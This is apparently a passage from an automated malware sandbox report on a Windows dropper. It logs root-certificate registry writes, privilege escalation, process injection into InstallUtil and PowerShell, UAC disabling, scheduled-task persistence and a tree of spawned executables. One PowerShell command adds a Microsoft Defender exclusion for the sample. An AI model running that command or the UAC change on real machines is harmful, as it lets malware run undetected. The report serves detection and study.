b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e C:\Users\Admin\Pictures\ErUlK6xejTvgF1mGobsQGIri.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 190000000100000010000000ffac207997bb2cfe865570179ee037b90f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703080b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac89988140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f1d0000000100000010000000a86dc6a233eb339610f3ed414927c559030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e404000000010000001000000078f2fcaa601f2fb4ebc937ba532e75492000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac3
4405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e C:\Users\Admin\Pictures\ErUlK6xejTvgF1mGobsQGIri.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = [blob data elided] C:\Users\Admin\Pictures\ErUlK6xejTvgF1mGobsQGIri.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 C:\Users\Admin\Pictures\ErUlK6xejTvgF1mGobsQGIri.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = [blob data elided] C:\Users\Admin\Pictures\ErUlK6xejTvgF1mGobsQGIri.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = [blob data elided] C:\Users\Admin\Pictures\ErUlK6xejTvgF1mGobsQGIri.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4 C:\Users\Admin\Pictures\ErUlK6xejTvgF1mGobsQGIri.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DDFB16CD4931C973A2037D3FC83A4D7D775D05E4\Blob = 0f00000001000000300000004ea1b34b10b982a96a38915843507820ad632c6aad8343e337b34d660cd8366fa154544ae80668ae1fdf3931d57e1996530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703080b00000001000000320000004400690067006900430065007200740020005400720075007300740065006400200052006f006f0074002000470034000000620000000100000020000000552f7bdcf1a7af9e6ce672017f4f12abf77240c78e761ac203d1d9d20ac89988140000000100000014000000ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f1d0000000100000010000000a86dc6a233eb339610f3ed414927c559030000000100000014000000ddfb16cd4931c973a2037d3fc83a4d7d775d05e42000000001000000940500003082059030820378a0030201020210059b1b579e8e2132e23907bda777755c300d06092a864886f70d01010c05003062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f74204734301e170d3133303830313132303030305a170d3338303131353132303030305a3062310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3121301f060355040313184469676943657274205472757374656420526f6f7420473430820222300d06092a864886f70d01010105000382020f003082020a0282020100bfe6907368debbe45d4a3c3022306933ecc2a7252ec9213df28ad859c2e129a73d58ab769acdae7b1b840dc4301ff31ba43816eb56c6976d1dabb279f2ca11d2e45fd6053c520f521fc69e15a57ebe9fa95716595572af689370c2b2ba75996a733294d11044102edf82f30784e6743b6d71e22d0c1bee20d5c9201d63292dceec5e4ec893f821619b34eb05c65eec5b1abcebc9cfcdac34405fb17a66ee77c848a86657579f54588e0c2bb74fa730d956eeca7b5de3adc94f5ee535e731cbda935edc8e8f80dab69198409079c378c
7b6b1c4b56a183803108dd8d437a42e057d88f5823e109170ab55824132d7db04732a6e91017c214cd4bcae1b03755d7866d93a31449a3340bf08d75a49a4c2e6a9a067dda427bca14f39b5115817f7245c468f64f7c169887698763d595d4276878997697a48f0e0a2121b669a74cade4b1ee70e63aee6d4ef92923a9e3ddc00e4452589b69a44192b7ec094b4d2616deb33d9c5df4b0400cc7d1c95c38ff721b2b211b7bb7ff2d58c702c4160aab1631844951a76627ef680b0fbe864a633d18907e1bdb7e643a418b8a67701e10f940c211db2542925896ce50e52514774be26acb64175de7aac5f8d3fc9bcd34111125be51050eb31c5ca72162209df7c4c753f63ec215fc420516b6fb1ab868b4fc2d6455f9d20fca11ec5c08fa2b17e0a2699f5e4692f981d2df5d9a9b21de51b0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e04160414ecd7e382d2715d644cdf2e673fe7ba98ae1c0f4f300d06092a864886f70d01010c05000382020100bb61d97da96cbe17c4911bc3a1a2008de364680f56cf77ae70f9fd9a4a99b9c9785c0c0c5fe4e61429560b36495d4463e0ad9c9618661b230d3d79e96d6bd654f8d23cc14340ae1d50f552fc903bbb9899696bc7c1a7a868a427dc9df927ae3085b9f6674d3a3e8f5939225344ebc85d03caed507a7d62210a80c87366d1a005605fe8a5b4a7afa8f76d359c7c5a8ad6a23899f3788bf44dd2200bde04ee8c9b4781720dc01432ef30592eaee071f256e46a976f92506d968d687a9ab236147a06f224b9091150d708b1b8897a8423614229e5a3cda22041d7d19c64d9ea26a18b14d74c19b25041713d3f4d7023860c4adc81d2cc3294840d0809971c4fc0ee6b207430d2e03934108521150108e85532de7149d92817504de6be4dd175acd0cafb41b843a5aad3c305444f2c369be2fae245b823536c066f67557f46b54c3f6e285a7926d2a4a86297d21ee2ed4a8bbc1bfd474a0ddf67667eb25b41d03be4f43bf40463e9efc2540051a08a2ac9ce78ccd5ea870418b3ceaf4988aff39299b6b3e6610fd28500e7501ae41b959d19a1b99cb19bb1001eefd00f4f426cc90abcee43fa3a71a5c84d26a535fd895dbc85621d32d2a02b54ed9a57c1dbfa10cf19b78b4a1b8f01b6279553e8b6896d5bbc68d423e88b51a256f9f0a680a0d61eb3bc0f0f537529aaea1377e4de8c8121ad07104711ad873d07d175bccff3667e C:\Users\Admin\Pictures\ErUlK6xejTvgF1mGobsQGIri.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\backgroundTaskHost.exe N/A
N/A N/A C:\Windows\system32\backgroundTaskHost.exe N/A
N/A N/A C:\Users\Admin\Pictures\4NBpuPydcM1CgkfkosSLJGBz.exe N/A
N/A N/A C:\Users\Admin\Pictures\4NBpuPydcM1CgkfkosSLJGBz.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe N/A
N/A N/A C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe N/A
N/A N/A C:\Windows\System32\Conhost.exe N/A
N/A N/A C:\Windows\System32\Conhost.exe N/A
N/A N/A C:\Users\Admin\Pictures\4NBpuPydcM1CgkfkosSLJGBz.exe N/A
N/A N/A C:\Users\Admin\Pictures\4NBpuPydcM1CgkfkosSLJGBz.exe N/A
N/A N/A C:\Users\Admin\Pictures\4NBpuPydcM1CgkfkosSLJGBz.exe N/A
N/A N/A C:\Users\Admin\Pictures\4NBpuPydcM1CgkfkosSLJGBz.exe N/A
N/A N/A C:\Users\Admin\Pictures\4NBpuPydcM1CgkfkosSLJGBz.exe N/A
N/A N/A C:\Users\Admin\Pictures\4NBpuPydcM1CgkfkosSLJGBz.exe N/A
N/A N/A C:\Users\Admin\Pictures\4NBpuPydcM1CgkfkosSLJGBz.exe N/A
N/A N/A C:\Users\Admin\Pictures\4NBpuPydcM1CgkfkosSLJGBz.exe N/A
N/A N/A C:\Users\Admin\Pictures\4NBpuPydcM1CgkfkosSLJGBz.exe N/A
N/A N/A C:\Users\Admin\Pictures\4NBpuPydcM1CgkfkosSLJGBz.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\Pictures\wTh7MiWkEaApgk3zkFBNItRS.exe N/A
N/A N/A C:\Users\Admin\Pictures\wTh7MiWkEaApgk3zkFBNItRS.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\is-NLG3O.tmp\8758677____.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Pictures\3XzaYMVbaZBj1IxsOKsToZGL.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\DigitalPulse\DigitalPulseService.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 34 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 35 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 36 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\cmd.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\cmd.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Windows\system32\backgroundTaskHost.exe N/A
N/A N/A C:\Windows\System32\Conhost.exe N/A
N/A N/A C:\Windows\syswow64\rundll32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4436 wrote to memory of 3820 N/A C:\Users\Admin\AppData\Local\Temp\221a6c13a9650792ab206e9103190b0cdeb556806ce2250b8b1111b0605098b3.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4436 wrote to memory of 3820 N/A C:\Users\Admin\AppData\Local\Temp\221a6c13a9650792ab206e9103190b0cdeb556806ce2250b8b1111b0605098b3.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4436 wrote to memory of 3820 N/A C:\Users\Admin\AppData\Local\Temp\221a6c13a9650792ab206e9103190b0cdeb556806ce2250b8b1111b0605098b3.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 4436 wrote to memory of 1596 N/A C:\Users\Admin\AppData\Local\Temp\221a6c13a9650792ab206e9103190b0cdeb556806ce2250b8b1111b0605098b3.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 4436 wrote to memory of 1596 N/A C:\Users\Admin\AppData\Local\Temp\221a6c13a9650792ab206e9103190b0cdeb556806ce2250b8b1111b0605098b3.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 4436 wrote to memory of 1596 N/A C:\Users\Admin\AppData\Local\Temp\221a6c13a9650792ab206e9103190b0cdeb556806ce2250b8b1111b0605098b3.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 4436 wrote to memory of 1596 N/A C:\Users\Admin\AppData\Local\Temp\221a6c13a9650792ab206e9103190b0cdeb556806ce2250b8b1111b0605098b3.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 4436 wrote to memory of 1596 N/A C:\Users\Admin\AppData\Local\Temp\221a6c13a9650792ab206e9103190b0cdeb556806ce2250b8b1111b0605098b3.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 4436 wrote to memory of 1596 N/A C:\Users\Admin\AppData\Local\Temp\221a6c13a9650792ab206e9103190b0cdeb556806ce2250b8b1111b0605098b3.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 4436 wrote to memory of 1596 N/A C:\Users\Admin\AppData\Local\Temp\221a6c13a9650792ab206e9103190b0cdeb556806ce2250b8b1111b0605098b3.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 4436 wrote to memory of 1596 N/A C:\Users\Admin\AppData\Local\Temp\221a6c13a9650792ab206e9103190b0cdeb556806ce2250b8b1111b0605098b3.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
PID 1596 wrote to memory of 3460 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\zlwXiUU8CKJFMILgAs1ACet7.exe
PID 1596 wrote to memory of 1536 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\fa311yJ4gzHSWLJUhnKRiwP0.exe
PID 1596 wrote to memory of 4892 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\f2aWE99yFgIVRBiiaEPY6g1L.exe
PID 1596 wrote to memory of 3252 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\4NBpuPydcM1CgkfkosSLJGBz.exe
PID 1596 wrote to memory of 4204 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\3XzaYMVbaZBj1IxsOKsToZGL.exe
PID 1596 wrote to memory of 4992 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\M7ml9FpyMLAeZLArPdUlqOKs.exe
PID 1596 wrote to memory of 3256 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\iAR3NEjxEx9jqAJE43HxlJxh.exe
PID 1596 wrote to memory of 4640 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\wTh7MiWkEaApgk3zkFBNItRS.exe
PID 1596 wrote to memory of 2512 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\ErUlK6xejTvgF1mGobsQGIri.exe
PID 1596 wrote to memory of 3944 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\o1KVbEn6m6gtxs3IlOKKQ5Er.exe
PID 1596 wrote to memory of 2408 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Users\Admin\Pictures\tPBVrOz9nznq7EI1j7HnHSNW.exe
PID 4892 wrote to memory of 560 N/A C:\Users\Admin\Pictures\f2aWE99yFgIVRBiiaEPY6g1L.exe C:\Users\Admin\AppData\Local\Temp\is-PL13U.tmp\f2aWE99yFgIVRBiiaEPY6g1L.tmp
PID 1536 wrote to memory of 4184 N/A C:\Users\Admin\Pictures\fa311yJ4gzHSWLJUhnKRiwP0.exe C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe
PID 2512 wrote to memory of 4584 N/A C:\Users\Admin\Pictures\ErUlK6xejTvgF1mGobsQGIri.exe C:\Users\Admin\Pictures\ErUlK6xejTvgF1mGobsQGIri.exe
PID 3256 wrote to memory of 5032 N/A C:\Users\Admin\Pictures\iAR3NEjxEx9jqAJE43HxlJxh.exe C:\Windows\system32\backgroundTaskHost.exe
PID 2512 wrote to memory of 2228 N/A C:\Users\Admin\Pictures\ErUlK6xejTvgF1mGobsQGIri.exe C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\ErUlK6xejTvgF1mGobsQGIri.exe
PID 5032 wrote to memory of 2644 N/A C:\Windows\system32\backgroundTaskHost.exe C:\Users\Admin\AppData\Local\Temp\is-6IF8E.tmp\_isetup\_setup64.tmp
PID 2512 wrote to memory of 4540 N/A C:\Users\Admin\Pictures\ErUlK6xejTvgF1mGobsQGIri.exe C:\Users\Admin\Pictures\ErUlK6xejTvgF1mGobsQGIri.exe
PID 4184 wrote to memory of 1996 N/A C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe C:\Windows\SysWOW64\schtasks.exe

System policy modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\221a6c13a9650792ab206e9103190b0cdeb556806ce2250b8b1111b0605098b3.exe N/A

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\221a6c13a9650792ab206e9103190b0cdeb556806ce2250b8b1111b0605098b3.exe

"C:\Users\Admin\AppData\Local\Temp\221a6c13a9650792ab206e9103190b0cdeb556806ce2250b8b1111b0605098b3.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\221a6c13a9650792ab206e9103190b0cdeb556806ce2250b8b1111b0605098b3.exe" -Force

C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"

C:\Users\Admin\Pictures\f2aWE99yFgIVRBiiaEPY6g1L.exe

"C:\Users\Admin\Pictures\f2aWE99yFgIVRBiiaEPY6g1L.exe"

C:\Users\Admin\Pictures\zlwXiUU8CKJFMILgAs1ACet7.exe

"C:\Users\Admin\Pictures\zlwXiUU8CKJFMILgAs1ACet7.exe"

C:\Users\Admin\Pictures\3XzaYMVbaZBj1IxsOKsToZGL.exe

"C:\Users\Admin\Pictures\3XzaYMVbaZBj1IxsOKsToZGL.exe"

C:\Users\Admin\Pictures\M7ml9FpyMLAeZLArPdUlqOKs.exe

"C:\Users\Admin\Pictures\M7ml9FpyMLAeZLArPdUlqOKs.exe"

C:\Users\Admin\Pictures\o1KVbEn6m6gtxs3IlOKKQ5Er.exe

"C:\Users\Admin\Pictures\o1KVbEn6m6gtxs3IlOKKQ5Er.exe"

C:\Users\Admin\Pictures\ErUlK6xejTvgF1mGobsQGIri.exe

"C:\Users\Admin\Pictures\ErUlK6xejTvgF1mGobsQGIri.exe" --silent --allusers=0

C:\Users\Admin\Pictures\wTh7MiWkEaApgk3zkFBNItRS.exe

"C:\Users\Admin\Pictures\wTh7MiWkEaApgk3zkFBNItRS.exe"

C:\Users\Admin\Pictures\iAR3NEjxEx9jqAJE43HxlJxh.exe

"C:\Users\Admin\Pictures\iAR3NEjxEx9jqAJE43HxlJxh.exe" /SP- /VERYSILENT /SUPPRESSMSGBOXES /PID=5333

C:\Users\Admin\Pictures\4NBpuPydcM1CgkfkosSLJGBz.exe

"C:\Users\Admin\Pictures\4NBpuPydcM1CgkfkosSLJGBz.exe"

C:\Users\Admin\Pictures\fa311yJ4gzHSWLJUhnKRiwP0.exe

"C:\Users\Admin\Pictures\fa311yJ4gzHSWLJUhnKRiwP0.exe"

